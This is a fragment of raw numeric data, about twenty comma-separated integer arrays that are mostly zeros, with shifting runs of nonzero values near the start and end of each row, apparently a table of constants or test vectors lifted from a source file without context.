[0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 36740, 54849, 57830, 16134, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 33024, 34880, 61456, 50308, 7297, 20906],
[0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 63108, 60737, 20198, 48134, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 57856, 34944, 32288, 41096, 4834, 15349],
[0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 23940, 1089, 48102, 14598, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 5888, 7616, 51568, 13788, 791, 48348],
[0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 50308, 6977, 10470, 46598, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 27392, 62144, 3760, 63375],
[0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 11140, 12865, 38374, 13062, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 32000, 26432, 12240, 62068, 31357, 64254],
[0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 37508, 18753, 742, 45062, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 36352, 37760, 10464, 49464, 49038, 40153],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 63876, 24641, 28646, 11526, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 13056, 50368, 64304, 28748, 12339, 12432],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 24708, 30529, 56550, 43526, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 40704, 28608, 14832, 49404, 19027],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 51076, 36417, 18918, 9990, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 47360, 38464, 17296, 62820, 50617, 32274],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 11908, 42305, 46822, 41990, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 31232, 11904, 14240, 39656, 45690, 51837],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 38276, 48193, 9190, 8454, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 36608, 15296, 24816, 6076, 12431, 8196],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 64644, 54081, 37094, 40454, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 8704, 47232, 45600, 6024, 13271],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 25476, 59969, 64998, 6918, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 13568, 5440, 60240, 15700, 6709, 36582],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 51844, 321, 27366, 38918, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 42496, 22912, 27232, 23960, 14246, 35041],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 12676, 6209, 55270, 5382, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 11008, 33472, 47792, 7212, 16427, 40760],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 39044, 12097, 17638, 37382, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 46336, 1344, 2896, 65108, 22555],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 65412, 17985, 45542, 3846, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 61696, 58432, 59152, 14916, 54257, 41338],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 26244, 23873, 7910, 35846, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 4608, 5248, 33056, 14664, 56082, 23557],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 52612, 29761, 35814, 2310, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 39936, 1792, 39360, 51312, 28060, 56071, 33324],
